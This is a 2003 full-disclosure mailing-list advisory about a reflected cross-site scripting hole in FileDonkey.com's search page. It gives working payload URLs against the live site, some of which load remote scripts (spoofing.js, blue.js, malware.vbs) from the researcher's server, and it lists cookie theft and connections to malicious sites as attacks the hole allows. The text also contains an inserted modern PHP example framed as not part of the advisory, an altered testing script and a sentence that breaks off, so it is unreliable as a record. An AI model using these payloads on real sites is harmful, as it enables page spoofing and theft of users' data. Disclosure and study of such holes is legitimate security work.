Date: Sun, 12 Oct 2003 18:49:59 +0200
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@...g-security.com>
To: "Full-Disclosure" <full-disclosure@...ts.netsys.com>
Cc: "BUGTRAQ" <bugtraq@...urityfocus.com>, <webmaster@...edonkey.com>
Subject: FileDonkey.com Cross Site Scripting


FileDonkey.com Cross Site Scripting
------

WEBSITE: File Donkey
DOMAIN: www.filedonkey.com
RISK: 7
OWNERS STATUS: webmaster@...edonkey.com [ warned same time as security lists ]
---------------------
--- DESCRIPTION ---

FileDonkey.com is the only web search engine supported by P2P clients such as
eMule, xMule, etc.
FileDonkey is a widely used website for finding the files you want on the
eDonkey (P2P) networks.

---------------------------------------------
|SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
---------------------------------------------

I was making some tests on the FileDonkey website but I didn't remember the
search engine.
Search engines are the first systems affected by Cross Site Scripting holes
because, normally, they have insufficient input validation and they produce
output (the search results) without checking for dangerous code. This can be
exploited easily with a few lines of PHP code and a little knowledge of PHP
and JavaScript.

---------------------------------------------
|     CROSS SITE SCRIPTING HOLES FOUND      |
---------------------------------------------

Located in the search engine, which currently uses a script with an HTML
extension, search.html.
This script basically uses 5 variables:

pattern=[KEYWORDS]
min_size=[FILE MIN SIZE]
max_size=[FILE MAX SIZE]
scope=[FILE TYPE]
submit=[YOUR SUBMIT BUTTON CODE]

But only one is needed : pattern=

You include the keywords for the wanted file and, voila! If the file is
available, it gives you a nice list of results ( ed2k links ).

The keywords sent will be shown in ( if there are no available files ) :

No files found for pattern 'NoSecureRootGroupSecurityResearch'.

OK, it seems not vulnerable, but wait a moment: the keywords are reflected in
the form field, and we know that a form field value always ends with a ">,
so let's try!
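To make the mechanism concrete, here is an added example (not code from the advisory, nor from FileDonkey) of a search page that reflects the pattern parameter into a form field and into the "No files found" text, first unescaped and then hardened with htmlspecialchars(); the exact markup layout is an assumption:

```php
<?php
// Added example: reflected XSS in a form field, vulnerable vs. hardened.
// The markup is assumed; the advisory only tells us the keyword lands in
// the form field and in the "No files found for pattern '...'" text.

// Vulnerable: the raw value lets "> close the attribute and inject markup.
function render_search_vulnerable(string $pattern): string
{
    return '<form action="search.html">'
         . '<input type="text" name="pattern" value="' . $pattern . '">'
         . '</form>'
         . "<p>No files found for pattern '" . $pattern . "'.</p>";
}

// Hardened: encode for the HTML attribute and text contexts.
// ENT_QUOTES also encodes the single quote, so the value cannot break out
// of either a double- or single-quoted attribute; the charset is explicit.
function render_search_safe(string $pattern): string
{
    $enc = htmlspecialchars($pattern, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form action="search.html">'
         . '<input type="text" name="pattern" value="' . $enc . '">'
         . '</form>'
         . "<p>No files found for pattern '" . $enc . "'.</p>";
}

// Simple check a reviewer can run: does a live <script> element survive?
function script_reflected(string $html): bool
{
    return strpos($html, '<script>') !== false;
}

// Constructed probe using the same break-out shape the advisory describes.
$probe = '"><script>alert(1)</script>';

var_dump(script_reflected(render_search_vulnerable($probe)));
var_dump(script_reflected(render_search_safe($probe)));
echo render_search_safe($probe), PHP_EOL;
?>
```

Run it from the command line with `php`: the first var_dump reports the tag surviving in the vulnerable page, the second shows it is neutralised, and the final line prints the encoded markup so you can see the `&quot;&gt;&lt;script&gt;` form the browser now treats as plain text.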

.....We send the request in POST mode... or use this URL:

http://www.filedonkey.com/search.html?pattern="><script>alert('xD .- Shields Down ! -. xD');</script>

And we get...

         -----JavaScript Application-----
         |                              |
         |  xD .- Shields Down ! -. xD  |
         |                              |
         |------------------------------|

The script was successfully executed on the client side.
Fantastic for attackers ( not me ;-).
We can try more things, and, of course, my beloved PHP performance:

.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
| CODE FOR THE COMMON XSS TESTING TASKS |
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

/\ cut from here /\


<?php
// ----------------------------------
// XSS TESTING SCRIPT
// NO SECURE ROOT GROUP SECURITY RESEARCH
// BY LORENZO HERNANDEZ GARCIA-HIERRO
// * NOT FULL VERSION *
// ----------------------------------
$domain  = "FileDonkey.com/Other";              // target label (unused in this cut-down version)
$member  = "Lorenzo Hernandez Garcia-Hierro";   // tester name (unused in this cut-down version)
$referer = getenv("HTTP_REFERER") ?: "";        // page that sent the request, if any
$data    = getenv("QUERY_STRING") ?: "";        // everything after the '?' in the request URL
// strip_tags() removes HTML tags from the probe before echoing it back.
// Note it is not a complete XSS filter: attribute contexts are not covered.
$xss = strip_tags($data);
echo $xss;
?>

/\ xss-testing.php END ! /\

Please note that I removed lots of lines of the code to prevent bad uses of
it.

A full version is running under
http://test-zone.nsrg-security.com/xss/?XSS_TEST
it has


-- THE REAL EXPLOITATION --

Now we start to exploit the xss hole :


*-.Possible attacks:

1.- Including malicious scripts to execute them on the client side.
2.- Trying to steal cookie data ( no cookies are given by FileDonkey ).
3.- Trying to connect to malicious sites through Microsoft.XMLHTTP.
4.- Trying to use known vulnerabilities to steal other domains' data.

SOME PROOFS OF CONCEPTS:
________________________

A script that I developed to change some web page content ( spoofing ) :

http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/spoofing.js></script>

A Georgi Guninski script ( shows a blue screen that spoofs the whole screen ) :

http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/blue.js></script>

Replace the Windows Media Player executable with a non-dangerous file that
shows a dialog with some nice stuff from the NSRGroup:

http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/malware.vbs></script>

The XSS standard testing script ( NSRGroup XSS-TST-STANDARD )

http://test-zone.nsrg-security.com/xss/?XSS-TST-STANDARD


*//*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
* REFERENCES -> ONLINE
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/

http://advisories.nsrg-security.com/FileDonkey.com-XSS

-----------
| CONTACT |
-----------

-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->Security Consultant
__________________________________
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html